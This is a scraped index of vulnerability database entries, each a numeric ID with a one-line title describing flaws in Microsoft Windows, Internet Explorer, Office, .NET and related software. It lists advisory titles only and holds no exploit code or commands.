WINS malformed packet flood denial of service [7318] Microsoft Windows ME SSDP service denial of service [7302] Microsoft Windows NT and 2000 Terminal Server malformed RDP packet series denial of service [7231] Microsoft Windows 95 using NetWare remote administration contains hidden share [7224] Microsoft Windows NT smbmount request from Linux client denial of service [7125] Microsoft Windows NT Index Server &quot [7107] Microsoft Windows NT Xenroll denial of service [7105] Microsoft Windows RPC endpoint mapper malformed request denial of service [7008] Microsoft Windows 2000 IrDA device denial of service [6977] Microsoft Windows NT and 2000 NNTP memory leak denial of service [6962] Microsoft Windows Media Player .ASF marker buffer overflow [6943] Microsoft Windows NT NT4ALL denial of service [6931] Microsoft Windows 2000 without Service Pack 2 [6924] Microsoft Windows 98 ARP packet flooding denial of service [6919] Microsoft Windows 2000 Task Manager does not terminate malicious files with the same name as a system process [6912] Microsoft Windows NT and 2000 Terminal Server RDP memory leak denial of service [6907] Microsoft Windows Media Player .NSC buffer overflow [6876] Microsoft Windows 2000 could allow an attacker to change network passwords [6874] Microsoft Windows 95/98 invalid path in registry could allow malicious file execution [6803] Microsoft Windows 2000 SMTP service allows mail relaying [6745] Microsoft Windows 2000 LDAP function could allow domain user password change [6669] Microsoft Windows 2000 Telnet system call denial of service [6668] Microsoft Windows 2000 Telnet handle leak denial of service [6667] Microsoft Windows 2000 Telnet multiple idle sessions denial of service [6666] Microsoft Windows 2000 Telnet username denial of service [6665] Microsoft Windows 2000 Telnet service weak domain authentication [6664] Microsoft Windows 2000 Telnet service predictable pipe names could allow elevation of privileges [6590] Microsoft Windows 2000 debug registers allow attacker to gain elevated privileges [6584] Microsoft Windows Media Player HTML code hidden in Internet shortcuts [6518] Microsoft Windows Index Server could allow attackers to view files on the Web server [6517] Microsoft Windows NT Index Server &quot [6506] Microsoft Windows 2000 Server Kerberos denial of service [6443] Microsoft Windows 2000 catalog file could remove installed hotfixes [6441] Microsoft Windows NT drivers DbgPrint function format string [6294] Microsoft Windows Me and Plus! 98 recovery of Compressed Folder passwords [6275] Microsoft Windows user.dmp file insecure permissions [6227] Microsoft Windows Media Player allows remote attackers to execute commands in Internet Explorer [6160] Microsoft Windows 2000 event viewer buffer overflow [6136] Microsoft Windows 2000 domain controller denial of service [6103] Microsoft Windows NT PPTP denial of service [6070] Microsoft Windows UDP socket denial of service [6062] Microsoft Windows DDE allows privilege elevation [6035] Microsoft Windows 2000 Server RDP denial of service [6006] Microsoft Windows NT mutex denial of service [5973] Microsoft Windows 2000 EFS allows local user to recover sensitive data [5937] Microsoft Windows Media Player skins can be used to execute arbitrary code [5936] Microsoft Windows 2000 Server Directory Service Restore Mode allows user to login with blank password [5800] Microsoft Windows 2000 Index Service ActiveX controls allow unauthorized access to file information [5746] Microsoft Windows NT MSTask.exe denial of service [5673] Microsoft Windows NT MTS registry permissions [5672] Microsoft Windows NT SNMP registry permissions [5671] Microsoft Windows NT RAS registry permissions [5623] Microsoft Windows NT and 2000 Phone Book service buffer overflow [5598] Microsoft Windows 2000 Telnet daemon could allow a denial of service [5585] Microsoft Windows 2000 brute force attack [5573] Microsoft Windows NT SynAttackProtect denial of service [5502] Microsoft Windows 2000 Indexing Services ixsso.query [5489] Microsoft Windows NT Terminal Server GINA RegAPI.DLL buffer overflow [5467] Microsoft Windows 2000 System Monitor ActiveX control buffer overflow [5417] Microsoft Windows NT MSIEXEC service uses the msi.dll registery key that has weak permissions [5411] Microsoft Windows File Share service denial of service [5399] Microsoft Windows NT and 2000 Network Monitor buffer overflow [5395] Microsoft Windows 9x share level password [5387] Microsoft Windows HyperTerminal Telnet buffer overflow [5370] Microsoft Windows 9x NetBIOS invalid driver type denial of service [5357] Microsoft Windows 9x malformed NWLink NMPI packet denial of service [5315] Microsoft Windows NT invalid LPC request [5301] Microsoft Windows 2000 Simplified Chinese IME State Recognition [5242] Microsoft Windows 2000 Telnet client NTLM authentication weakness [5222] Microsoft Windows 2000 malformed RPC packet denial of service [5203] Microsoft Windows 2000 still image service [5193] Microsoft Windows Media Services Unicast Service denial of service [5171] Microsoft Windows 2000 Local Security Policy corruption [5168] Microsoft Windows NetBIOS cache corruption [5097] Microsoft Windows folder.htt allows execution of active scripting without approval [5079] Microsoft Windows 95/98 malformed IPX ping packet denial of service [5040] Microsoft Windows NT/2000 explorer.exe uses relative path name in registry [5035] Microsoft Windows NT/2000 NetBIOS Name Server spoofed name conflict [5033] Microsoft Windows 2000 without Service Pack 1 [5031] Microsoft Windows 2000 Service Control Manager named pipe could allow a unauthorized user to gain privileges [5015] Microsoft Windows NT and 2000 executable path [4887] Microsoft Windows 2000 Kerberos ticket renewed [4886] Microsoft Windows 2000 logon session reconnected [4885] Microsoft Windows 2000 logon session disconnected [4882] Microsoft Windows 2000 Kerberos pre-authentication failed [4873] Microsoft Windows 2000 user account mapped for logon [4872] Microsoft Windows 2000 account logon failed [4871] Microsoft Windows 2000 account used for logon [4855] Microsoft Windows 2000 group type change [4828] Microsoft Windows 95/98 ARP spoofing [4823] Microsoft Windows 2000 Telnet server binary stream denial of service [4819] Microsoft Windows 2000 default SYSKEY configuration [4787] Microsoft Windows 2000 user account locked out [4786] Microsoft Windows 2000 computer account created [4785] Microsoft Windows 2000 computer account changed [4784] Microsoft Windows 2000 computer account deleted [4714] Microsoft Windows 2000 &quot [4702] Microsoft Windows event log full [4700] Microsoft Windows computer password not found in local security database [4698] Microsoft Windows EventLog service started [4688] Microsoft Windows Network Monitor driver started [4673] Microsoft Windows resources for queuing of audit messages have been exhausted [4671] Microsoft Windows event log file cannot be opened [4670] Microsoft Windows event log file corrupted [4648] Microsoft Windows NT malformed remote registry request denial of service [4608] Microsoft Windows NT computer account creation can compromise User Session Key [4600] Microsoft Windows NT denial of service caused by unacknowledged SMB requests [4589] Microsoft Windows 2000 protected store can be compromised by brute force attack [4585] Microsoft Windows Encoder denial of service [4552] Microsoft Windows Browser service can be shutdown by an unauthorized remote user [4547] Microsoft Windows Master Browser browse table can be filled with bogus entries [4517] Microsoft Windows NT user account locked out [4516] Microsoft Windows NT user account enabled [4515] Microsoft Windows NT user account disabled [4337] Microsoft Windows NT/2000 cmd.exe buffer overflow [4332] Microsoft Windows NT registry permissions could allow compromise of cryptographic keys [4278] Microsoft Windows 2000 unattended install does not secure All Users profile [4247] Microsoft Windows 95/98 printer sharing allows read access [4221] Microsoft Windows NT drive mapping allows local users to execute arbitrary code [4203] Microsoft Windows TCP/IP Printing Service denial of service [4141] Microsoft Windows can be configured to transmit unencrypted passwords to SMB server [4140] Microsoft Windows Telnet service authentication may expose user passwords [4138] Microsoft Windows 2000 system file integrity feature is disabled [4111] Microsoft Windows NT 4.0 registry permissions [4108] Microsoft Windows Media Technologies malformed license request denial of service [4107] Microsoft Windows path names containing DOS devices denial of service [4086] Microsoft Windows 2000 may not start Jaz drives correctly [4085] Microsoft Windows 2000 non-Gregorial calendar error [4084] Microsoft Windows 2000 may prevent Adobe FrameMaker files from being saved in some formats [4083] Microsoft Windows 2000 Terminal Services may damage Office files saved as HTML [4082] Microsoft Windows 2000 and Iomega parallel port drives display error [4081] Microsoft Windows invalid image error when using OLE libraries [4080] Microsoft Windows 2000 AOL image support [4079] Microsoft Windows 2000 High Encryption Pack [4034] Microsoft Windows Media Services handshake packets denial of service [4016] Microsoft Windows NT Recycle Bin could allow an unauthorized user to modify deleted files [3993] Microsoft Windows Trin00 Distributed Denial of Service (DDoS) tool found [3909] Microsoft Windows 9x share is writable [3906] Microsoft Windows NT share is readable [3694] Microsoft Windows NT malformed resource enumeration denial of service [3574] Microsoft Windows 9x cache could reveal plaintext password [3534] Microsoft Windows NT 4.0 without Service Pack 6 [3373] Microsoft Windows NT user shell folders could allow users to gain administrator privileges [3328] Microsoft Windows ARP packet denial of service [3251] Microsoft Windows allows source routing when configured to reject source routed packets [3248] Microsoft Windows NT RASMAN pathname [3226] Microsoft Windows NT 4.0 unattended installation could expose sensitive information to local users [3168] Microsoft Windows NT SP4-SP6 TCP sequence numbers are predictable [3129] Microsoft Windows Telnet.exe remote buffer overflow [3109] Microsoft Windows NT Phone Dialer utility contains a locally exploitable buffer overflow [3106] Microsoft Windows NT DNS server can be remotely crashed by sending a response to a non-existant request [3104] Microsoft Windows NT TSE denial of service can consume all available memory [2750] Microsoft Windows started/stopped [2677] Microsoft Windows NT old operating system [2549] Microsoft Windows NT install date changed [2336] Microsoft Windows NT login default folder allows a user to bypass policies [2313] Microsoft Windows NT can be crashed by executables containing malformed image headers [2299] Microsoft Windows NT CSRSS denial of service [2291] Microsoft Windows NT Local Security Authority (LSA) can be remotely crashed, requiring a system reboot [2243] Microsoft Windows NT RAS/RRAS clients cache passwords regardless of setting [2201] Microsoft Windows NT 4.0 without Service Pack 5 [2200] Microsoft Windows NT RAS client contains an exploitable buffer overflow [2190] Microsoft Windows NT 4.0 help file utility contains a locally exploitable buffer overflow [2141] Microsoft SQL Server can be configured to use the Windows NT account SQLExecCmdExe when running xp_cmdshell for non-sa logins [2129] Microsoft SQL Server should use limited Windows NT protocols to make attacks more difficult [2102] Microsoft Windows NT allows files to exceed the supposed maximum length [1977] Microsoft Windows NT RPC services can be used to deplete system resources [1976] Microsoft Windows NT gina flaw allows locked-out users to log in [1975] Microsoft Windows NT gina allows some clipboard text to be revealed [1974] Microsoft Windows NT SNMP agent memory leak [1947] Microsoft Windows NT/9x can be frozen with redirect packets [1946] Microsoft Windows NT screen saver can be used to compromise administrator privileges [1820] Microsoft Windows NT 4.0 domain caching feature can be exploited to gain administrator privileges [1771] Microsoft Windows 95/98 configurations may lead to excessive bandwidth consumption [1758] Microsoft SQL Server extended stored procedure, xp_cmdshell, can be used to gain Windows NT administrator rights [1719] Microsoft Windows NT 4.0 SP4 could allow null passwords to be used for access [1566] Microsoft Windows NT user account deleted [1556] Microsoft Windows NT user account created [1394] Microsoft Windows NT 4.0 without Service Pack 4 [1372] Microsoft Windows NT snork attack can disable system [1321] Microsoft Windows Interactive_Guest_Logon [1320] Microsoft Windows legal notice display not enabled [1319] Microsoft Windows local user on workstation [1315] Microsoft Windows network Guest logon [1314] Microsoft Windows NT user has never logged on [1312] Microsoft Windows NT null session user modals [1296] Microsoft Windows service user [1295] Microsoft Windows NT service user password found [1291] Microsoft Windows shutdown without logon enabled [1288] Microsoft Windows NT system key encryption not enabled [1286] Microsoft Windows NT TCP/IP security not enabled [1285] Microsoft Windows trojan key permissions [1284] Microsoft Windows NT trusted domain [1075] Microsoft Windows file-sharing access error [981] Microsoft Windows WINS exploit using SNMP [710] Microsoft Windows NT portbind issue [679] Microsoft Windows null session [539] Microsoft Windows 95 and Internet Explorer password disclosure [538] Microsoft Windows NT Winpopup DoS attack [536] Microsoft Windows NT discloses system information [535] Microsoft Windows NT sometimes does not kill all processes when logging out [534] Microsoft Windows 95 stores many passwords in plain text in the registry [530] Microsoft Windows NT RAS service packet filtering rules can be bypassed [529] Microsoft Windows NT case problems can lead to admin access [528] Microsoft Windows NT fragmentation attack [526] Microsoft Windows NT path is insecure and can be easily trojaned [342] Microsoft Windows NT SMB logon denial of service [283] Microsoft Windows account password guessed [186] Microsoft Windows NT DNS denial of service [172] Microsoft Windows NT Post-SP2 security patches missing [168] Microsoft Windows key with incorrect permissions [140] Microsoft Windows telnet service installed [138] Microsoft Windows system log accessible [121] Microsoft Windows NT security log accessible [120] Microsoft Windows schedule service running [114] Microsoft Windows NT rsh service Running [102] Microsoft Windows NT rexec service running [99] Microsoft Windows registry can be opened remotely [98] Microsoft Windows NT rcmd service running [92] Microsoft Windows NT rlogin service installed [66] Microsoft Windows NT kernel outdated [17] Microsoft Windows NT RPC locator denial of service [16] Microsoft Windows Remote Access Service [14] Microsoft Windows NT 4.0 without Service Pack 3 [13] Microsoft Windows Network Monitor insecure password [11] Microsoft Windows NT 4.0 beta [86263] National Instruments LabWindows/CVI unspecified [86261] ABB DataManager National Instruments LabWindows/CVI, LabVIEW unspecified [86088] Microsoft Internet Explorer CVE-2013-3199 code execution [86087] Microsoft Internet Explorer CVE-2013-3194 code execution [86086] Microsoft Internet Explorer CVE-2013-3193 code execution [86085] Microsoft Internet Explorer CVE-2013-3191 code execution [86084] Microsoft Internet Explorer CVE-2013-3190 code execution [86083] Microsoft Internet Explorer CVE-2013-3189 code execution [86082] Microsoft Internet Explorer CVE-2013-3188 code execution [86081] Microsoft Internet Explorer CVE-2013-3187 code execution [86080] Microsoft Internet Explorer CVE-2013-3184 code execution [86079] Microsoft Internet Explorer EUC-JP information disclosure [86078] Microsoft Internet Explorer integrity level privilege escalation [85802] Microsoft PowerPoint denial of service [85762] Microsoft Internet Explorer sandbox bypass [85276] Cisco Jabber for Windows denial of service [85242] Microsoft .NET Framework and Microsoft Silverlight privilege escalation [85241] Microsoft .NET Framework and Microsoft Silverlight code execution [85240] Microsoft .NET Framework and Microsoft Silverlight code execution [85239] Microsoft .NET Framework and Microsoft Silverlight privilege escalation [85238] Microsoft .NET Framework and Microsoft Silverlight privilege escalation [85237] Microsoft .NET Framework and Microsoft Silverlight code execution [85222] Microsoft Internet Explorer Shift JIS information disclosure [85221] Microsoft Internet Explorer CVE-2013-3164 code execution [85220] Microsoft Internet Explorer CVE-2013-3163 code execution [85219] Microsoft Internet Explorer CVE-2013-3162 code execution [85218] Microsoft Internet Explorer CVE-2013-3161 code execution [85217] Microsoft Internet Explorer CVE-2013-3153 code execution [85216] Microsoft Internet Explorer CVE-2013-3152 code execution [85215] Microsoft Internet Explorer CVE-2013-3151 code execution [85214] Microsoft Internet Explorer CVE-2013-3150 code execution [85213] Microsoft Internet Explorer CVE-2013-3149 code execution [85212] Microsoft Internet Explorer CVE-2013-3148 code execution [85211] Microsoft Internet Explorer CVE-2013-3147 code execution [85210] Microsoft Internet Explorer CVE-2013-3146 code execution [85209] Microsoft Internet Explorer CVE-2013-3145 code execution [85208] Microsoft Internet Explorer CVE-2013-3144 code execution [85207] Microsoft Internet Explorer CVE-2013-3143 code execution [85206] Microsoft Internet Explorer CVE-2013-3115 code execution [85204] Microsoft DirectShow code execution [85133] Microsoft Outlook phishing [84965] Microsoft Sharepoint Online cross site scripting [84916] Microsoft Internet Explorer ASLR information disclosure [84691] Microsoft Internet Explorer code execution [84690] Microsoft Internet Explorer code execution [84616] Microsoft Office code execution [84612] Microsoft Internet Explorer code execution [84611] Microsoft Internet Explorer code execution [84610] Microsoft Internet Explorer code execution [84609] Microsoft Internet Explorer code execution [84608] Microsoft Internet Explorer code execution [84607] Microsoft Internet Explorer code execution [84606] Microsoft Internet Explorer code execution [84605] Microsoft Internet Explorer code execution [84604] Microsoft Internet Explorer code execution [84603] Microsoft Internet Explorer code execution [84602] Microsoft Internet Explorer code execution [84601] Microsoft Internet Explorer code execution [84599] Microsoft Internet Explorer code execution [84598] Microsoft Internet Explorer code execution [84597] Microsoft Internet Explorer code execution [84596] Microsoft Internet Explorer code execution [84595] Microsoft Internet Explorer code execution [84581] Novell Client for Windows NWFS.SYS buffer overflow [84580] Novell Client for Windows NICM.SYS privilege escalation [84266] Multiple Microsoft products code execution [84019] Microsoft Internet Explorer MSXML information disclosure [84011] Microsoft Security Essentials privilege escalation [84007] Microsoft Internet Explorer CGenericElement object code execution [84002] DotNetNuke modal windows cross-site scripting [83995] Microsoft Internet Explorer code execution [83909] Microsoft Internet Explorer code execution [83908] Microsoft Internet Explorer code execution [83907] Microsoft Internet Explorer code execution [83906] Microsoft Internet Explorer code execution [83905] Microsoft Internet Explorer code execution [83904] Microsoft Internet Explorer code execution [83903] Microsoft Internet Explorer code execution [83902] Microsoft Internet Explorer code execution [83901] Microsoft Internet Explorer code execution [83900] Microsoft Internet Explorer code execution [83899] Microsoft Internet Explorer information disclosure [83897] Microsoft Publisher buffer underflow [83896] Microsoft Publisher code execution [83895] Microsoft Publisher code execution [83894] Microsoft Publisher code execution [83893] Microsoft Publisher code execution [83892] Microsoft Publisher code execution [83891] Microsoft Publisher buffer overflow [83890] Microsoft Publisher code execution [83889] Microsoft Publisher code execution [83888] Microsoft Publisher integer overflow [83887] Microsoft Publisher code execution [83885] Microsoft Word code execution [83883] Microsoft Visio information disclosure [83881] Microsoft Lync code execution [83879] Microsoft .NET Framework security bypass [83878] Microsoft .NET Framework spoofing [83191] Microsoft Internet Explorer code execution [83190] Microsoft Internet Explorer code execution [83172] Skype for Windows multiple unspecified [83092] Microsoft Remote Desktop ActiveX control code execution [83087] Microsoft SharePoint information disclosure [83085] Microsoft Antimalware Client privilege escalation [83083] Microsoft SharePoint and Microsoft Office Web Apps privilege escalation [82975] NVIDIA Graphics Drivers for Windows privilege escalation [82974] NVIDIA Graphics Drivers for Windows privilege escalation [82771] Microsoft Internet Explorer sandbox denial of service [82766] NVIDIA Graphics Drivers for Windows privilege escalation [82731] Microsoft Internet Explorer CTreeNode code execution [82443] Microsoft Office code execution [82423] Microsoft Silverlight code execution [82421] Microsoft SharePoint W3WP denial of service [82420] Microsoft SharePoint input privilege escalation [82419] Microsoft SharePoint JavaScript privilege escalation [82418] Microsoft SharePoint Callback privilege escalation [82416] Microsoft Visio Viewer memory code execution [82409] Microsoft Internet Explorer removeChild code execution [82408] Microsoft Internet Explorer onBeforeCopy code execution [82407] Microsoft Internet Explorer GetMarkupPtr code execution [82406] Microsoft Internet Explorer CElement code execution [82405] Microsoft Internet Explorer CCaret code execution [82404] Microsoft Internet Explorer CMarkupBehaviorContext code execution [82403] Microsoft Internet Explorer saveHistory code execution [82402] Microsoft Internet Explorer OnResize code execution [82400] Microsoft Office for Mac information disclosure [82398] Microsoft Office OneNote information disclosure [81900] Microsoft Skype GiftCards cross-site scripting [81728] Microsoft Internet Explorer SRC information disclosure [81706] Microsoft Internet Explorer SSL lock spoofng [81705] Microsoft Internet Explorer TCP sessions information disclosure [81667] Microsoft .NET Framework WinForms privilege escalation [81633] Microsoft Internet Explorer CObjectElement code execution [81631] Microsoft Internet Explorer InsertElement code execution [81630] Microsoft Internet Explorer SLayoutRun code execution [81629] Microsoft Internet Explorer pasteHTML code execution [81628] Microsoft Internet Explorer CDispNode code execution [81627] Microsoft Internet Explorer LsGetTrailInfo code execution [81626] Microsoft Internet Explorer vtable code execution [81625] Microsoft Internet Explorer CMarkup code execution [81624] Microsoft Internet Explorer COmWindowProxy code execution [81623] Microsoft Internet Explorer SetCapture code execution [81622] Microsoft Internet Explorer Shift JIS information disclosure [81212] Microsoft Lync User-Agent cross-site scripting [80885] Microsoft Internet Explorer CDwnBindInfo code execution [80871] Microsoft .NET Framework permission privilege escalation [80870] Microsoft .NET Framework S.D.S.P. privilege escalation [80868] Microsoft .NET Framework information disclosure [80866] Microsoft .NET Framework OData denial of service [80847] NVIDIA Graphics Drivers for Windows buffer overflow [80750] Microsoft Internet Explorer denial of service [80647] Microsoft Internet Explorer cursor information disclosure [80523] Microsoft Exchange Server RSS feeds denial of service [80364] Microsoft Internet Explorer improper ref counting code execution [80363] "Microsoft Internet Explorer CMarkup code execution" [80362] Microsoft Internet Explorer InjectHTMLStream code execution [80355] Microsoft Word RTF code execution [80310] Microsoft Internet Explorer CHTML code execution [80149] Microsoft Office OneNote code execution [79998] Microsoft Excel file code execution [79997] Microsoft Visio code execution [79996] Microsoft Publisher code execution [79990] Microsoft Excel xls code execution [79749] Microsoft Internet Explorer multiple unspecified code execution [79748] Microsoft Internet Explorer memory code execution [79692] Microsoft .NET Framework reflection privilege escalation [79691] Microsoft .NET Framework Web proxy code execution [79690] Microsoft .NET Framework DLL code execution [79689] Microsoft .NET Framework output information disclosure [79688] Microsoft .NET Framework reflection privilege escalation [79686] Microsoft Internet Explorer CTreeNode code execution [79685] Microsoft Internet Explorer CTreePos code execution [79684] Microsoft Internet Explorer CFormElement code execution [79674] Microsoft Excel data structure buffer overflow [79651] Microsoft Paint .bmp denial of service [79650] Microsoft Excel code execution [79649] Microsoft Office Publisher denial of service [79614] Microsoft Internet Explorer scrollIntoView code execution [79599] Microsoft Office Picture Manager code execution [79590] Microsoft Word .doc buffer overflow [79492] Microsoft Internet Explorer filter cross-site scripting [79251] Microsoft Internet Explorer CPasteCommand code execution [79231] EMC NetWorker Module for Microsoft Applications (NMM) administrator credential disclosure [79230] EMC NetWorker Module for Microsoft Applications (NMM) communication channel code execution [79198] Microsoft Excel code execution [78863] Microsoft Works RTF code execution [78857] Microsoft SQL Server cross-site scripting [78852] Microsoft Lync and Microsoft SharePoint privilege escalation [78850] Microsoft Office RTF fiiles code execution [78849] Microsoft Word PAPX code execution [78822] Google Chrome CVE-2012-2897 Windows kernel memory corruption [78759] Microsoft Internet Explorer cloneNode() code execution [78758] Microsoft Internet Explorer Layout object code execution [78757] Microsoft Internet Explorer Event Listener code execution [78756] Microsoft Internet Explorer onMove() code execution [78598] Microsoft Internet Explorer use-after-free code execution [78076] Microsoft System Center Configuration Manager cross-site scripting [78074] Microsoft Excel SST Invalid Length code execution [78073] Microsoft Excel code execution [78070] Microsoft System Center Operations Manager cross-site scripting [78069] Microsoft System Center Operations Manager cross-site scripting [77993] Microsoft Indexing Service ActiveX control denial of service [77878] Microsoft MS-CHAP v2 information disclosure [77361] Microsoft Visio DXF buffer overflow [77359] Microsoft Internet Information Services FTP information disclosure [77358] Microsoft Internet Information Services log files information disclosure [77351] Microsoft Office CGM code execution [77345] Microsoft Internet Explorer virtual function table code execution [77344] Microsoft Internet Explorer null object code execution [77343] Microsoft Internet Explorer layout memory code execution [77324] Microsoft Visual Studio Team Foundation Server cross-site scripting [77317] Citrix Access Gateway Plug-in for Windows ActiveX control buffer overflow [77316] Citrix Access Gateway Plug-in for Windows ActiveX control buffer overflow [76807] Microsoft Office for Mac privilege escalation [76743] Microsoft .NET Framework tilde denial of service [76723] Microsoft Internet Explorer attribute code execution [76722] Microsoft Internet Explorer cached code execution [76717] Microsoft Data Access Components XML code execution [76716] Microsoft IIS FTP denial of service [76710] Microsoft SharePoint JavaScript cross-site scripting [76709] Microsoft SharePoint URL spoofing [76708] Microsoft SharePoint JavaScript cross-site scripting [76706] Microsoft SharePoint scriptresx.ashx cross-site scripting [76664] Microsoft IIS tilde information disclosure [76339] XAMPP for Windows cds.php and perlinfo.pl cross-site scripting [76338] XAMPP for Windows cds.php SQL injection [76306] Opera pop-up windows code execution [76185] Microsoft Internet Information Server ASPX information disclosure [76184] Microsoft Internet Information Server INDEX_ALLOCATION security bypass [76183] Microsoft Internet Information Server INDEX_ALLOCATION security bypass [76182] Microsoft Internet Information Server request security bypass [75983] MapServer for Windows Apache file include [75977] Microsoft WordPad .doc denial of service [75962] Microsoft Internet Explorer Scrolling Events information disclosure [75961] Microsoft Internet Explorer OnRowsInserted Event code execution [75960] Microsoft Internet Explorer insertRow code execution [75959] Microsoft Internet Explorer insertAdjacentText code execution [75958] Microsoft Internet Explorer OnBeforeDeactivate Event code execution [75957] Microsoft Internet Explorer Title Element Change code execution [75956] Microsoft Internet Explorer Col Element code execution [75955] Microsoft Internet Explorer same id property code execution [75954] Microsoft Internet Explorer Developer Toolbar code execution [75953] Microsoft Internet Explorer process memory information disclosure [75952] Microsoft Internet Explorer EUC-JP character information disclosure [75950] Microsoft Internet Explorer Center Element code execution [75948] Microsoft Visual Basic for Applications DLL code execution [75941] Microsoft .NET Framework function code execution [75925] Microsoft Dynamics AX Enterprise Portal cross-site scripting [75904] Microsoft Lync HTML information disclosure [75903] Microsoft Lync DLL code execution [75163] Microsoft Visual Studio linker buffer overflow [75135] Microsoft Silverlight XAML code execution [75134] Microsoft .NET Framework index denial of service [75133] Microsoft .NET Framework buffer code execution [75122] Microsoft Office RTF code execution [75119] Microsoft Excel series record code execution [75118] Microsoft Excel MergeCells buffer overflow [75117] Microsoft Excel SXLI code execution [75115] Microsoft Visio Viewer memory code execution [75098] Microsoft .NET Framework EncoderParameter buffer overflow [74555] Microsoft Office WPS Converter buffer overflow [74383] Microsoft Internet Explorer VML code execution [74382] Microsoft Internet Explorer SelectAll code execution [74381] "Microsoft Internet Explorer OnReadyStateChange code execution" [74380] Microsoft Internet Explorer JScript9 code execution [74379] Microsoft Internet Explorer HTML page code execution [74377] Microsoft .NET Framework parameter code execution [74376] Microsoft .NET Framework input code execution [74375] Microsoft .NET Framework serialization code execution [74368] Microsoft Forefront Unified Access Gateway information disclosure [74367] Microsoft Forefront Unified Access Gateway spoofing [73870] Microsoft Internet Explorer Protected Mode denial of service [73869] Microsoft Internet Explorer unspecified buffer overflow [73539] Microsoft DirectWrite denial of service [73537] Microsoft Visual Studio privilege escalation [73535] Microsoft Expression Design code execution [73029] Microsoft Internet Explorer BODY denial of service [72938] Skype for Windows unspecified [72886] Microsoft SharePoint wizardlist.aspx cross-site scripting [72885] Microsoft SharePoint themeweb.aspx cross-site scripting [72884] Microsoft SharePoint inplview.aspx cross-site scripting [72872] Microsoft Excel bytes code execution [72871] Microsoft Excel OBJECTLINK record code execution [72870] Microsoft Excel file code execution [72864] Microsoft Visio attributes code execution [72863] Microsoft Visio code execution [72862] Microsoft Visio Viewer code execution [72861] Microsoft Visio attributes code execution [72860] Microsoft Visio Viewer code execution [72848] Microsoft .NET Framework buffer overflow [72847] Microsoft .NET Framework and Microsoft Silverlight unmanaged objects code execution [72845] Microsoft Internet Explorer VML code execution [72844] Microsoft Internet Explorer memory information disclosure [72843] Microsoft Internet Explorer HtmlLayout code execution [72842] Microsoft Internet Explorer copy and paste information disclosure [72028] Microsoft ASP.NET forms authentication open redirect [72027] Microsoft ASP.NET forms authentication security bypass [72026] Microsoft ASP.NET forms authentication ticket caching privilege escalation [71990] Microsoft Anti-Cross Site Scripting Library security bypass [71989] Microsoft ASP.NET CaseInsensitiveHashProvider.getHashCode() function denial of service [71817] Microsoft Internet Explorer CSS information disclosure [71813] Microsoft Internet Explorer getComputedStyle information disclosure [71808] Microsoft .NET Framework SaveAs() security bypass [71635] Microsoft Internet Explorer cache objects information disclosure [71561] Microsoft Excel record memory code execution [71556] Microsoft PowerPoint record code execution [71555] Microsoft PowerPoint DLL code execution [71547] Microsoft Time binary code execution [71545] Microsoft Internet Explorer Content-Disposition information disclosure [71544] Microsoft Internet Explorer HTML DLL code execution [71543] Microsoft Internet Explorer cross-site scripting filter information disclosure [71541] Microsoft Publisher memory code execution [71540] Microsoft Publisher pointer code execution [71539] Microsoft Publisher out-of-bounds code execution [71537] Microsoft Word memory code execution [71200] Mozilla Firefox and Thunderbird Windows D2D security bypass [71117] Microsoft Excel vbscript macro code execution [70565] Microsoft Publisher pubconv.dll buffer overflow [70564] WebKit DOM windows cross-site scripting [70337] OpenOffice.org Microsoft Word .doc sprm file parser denial of service [70148] Microsoft Host Integration Server UDP denial of service [70139] Microsoft Office IME privilege escalation [70128] Microsoft Internet Explorer Body Element code execution [70126] "Microsoft Internet Explorer Jscript9.dll code execution" [70125] Microsoft Internet Explorer Onload Event code execution [70124] Microsoft Internet Explorer Option Element code execution [70123] "Microsoft Internet Explorer OLEAuto32.dll code execution" [70122] Microsoft Internet Explorer Scroll Event code execution [70107] Microsoft Forefront Unified Access Gateway NULL denial of service [70106] Microsoft Forefront Unified Access Gateway applet code execution [70105] Microsoft Forefront Unified Access Gateway cross-site scripting [70104] Microsoft Forefront Unified Access Gateway ExcelTable cross-site scripting [70103] Microsoft Forefront Unified Access Gateway ExcelTable response splitting [69863] Google Chrome Windows Media Player plug-in unspecified [69826] Microsoft SharePoint Server Source open redirect [69500] Microsoft Office object pointer code execution [69499] Microsoft Office DLL code execution [69497] Microsoft Excel integer code execution [69496] Microsoft Excel expression code execution [69495] Microsoft Excel records code execution [69494] Microsoft Excel array code execution [69493] Microsoft Excel WriteAV code execution [69344] Microsoft compound document detected [69293] Microsoft Internet Explorer HTTPS security bypass [69229] Mozilla Firefox, Thunderbird, and SeaMonkey Windows D2D hardware acceleration security bypass [69214] Microsoft Internet Explorer Iedvtool.dll denial of service [68855] HP Arcsight Connector Appliance Windows Event Log SmartConnector privilege escalation [68835] Microsoft SharePoint EditForm.aspx cross-site scripting [68834] Microsoft SharePoint cross-site scripting [68832] Microsoft Chart control information disclosure [68828] Microsoft .NET Framework socket information disclosure [68826] Microsoft Report Viewer information disclosure [68822] Microsoft Internet Explorer style code execution [68821] Microsoft Internet Explorer xslt code execution [68820] Microsoft Internet Explorer character sequences information [68819] Microsoft Internet Explorer telnet URI code execution [68818] Microsoft Internet Explorer event handlers information disclosure [68817] Microsoft Internet Explorer race condition code execution [68811] Microsoft Visio pStream code execution [68810] Microsoft Visio Move Around the Block code execution [68786] Microsoft Internet Explorer EUC-JP cross-site scripting [68554] Citrix Access Gateway Plug-in for Windows ActiveX control buffer overflow [68498] Microsoft Internet Explorer memory layout information disclosure [68226] Apple Mac OS X QuickLook Microsoft Office files code execution [68024] Microsoft Office XP remote code execution [68007] Microsoft Word wdGetApplicationObject() code execution [67991] Microsoft Lync Server ReachJoin.aspx command execution [67954] Microsoft Internet Explorer HTTP redirect code execution [67953] Microsoft Internet Explorer selection object code execution [67952] Microsoft Internet Explorer layout code execution [67951] Microsoft Internet Explorer drag and drop information disclosure [67950] Microsoft Internet Explorer DOM code execution [67949] Microsoft Internet Explorer time element code execution [67948] Microsoft Internet Explorer drag and drop code execution [67947] Microsoft Internet Explorer toStaticHTML API information disclosure [67946] Microsoft Internet Explorer DOM code execution [67945] Microsoft Internet Explorer link properties code execution [67944] Microsoft Internet Explorer Web pages information disclosure [67890] Microsoft Internet Explorer cross-zone drag-and-drop information disclosure [67761] Microsoft XML Editor Web Service Discovery information disclosure [67752] Microsoft .NET Framework and Microsoft Silverlight XAML code execution [67736] Microsoft Forefront Threat Management Gateway TMG Firewall Client buffer overflow [67717] Microsoft Excel WriteAV code execution [67716] Microsoft Excel WriteAV code execution [67715] Microsoft Excel information code execution [67714] Microsoft Excel record information buffer overflow [67713] Microsoft Excel record buffer overflow [67712] Microsoft Excel array code execution 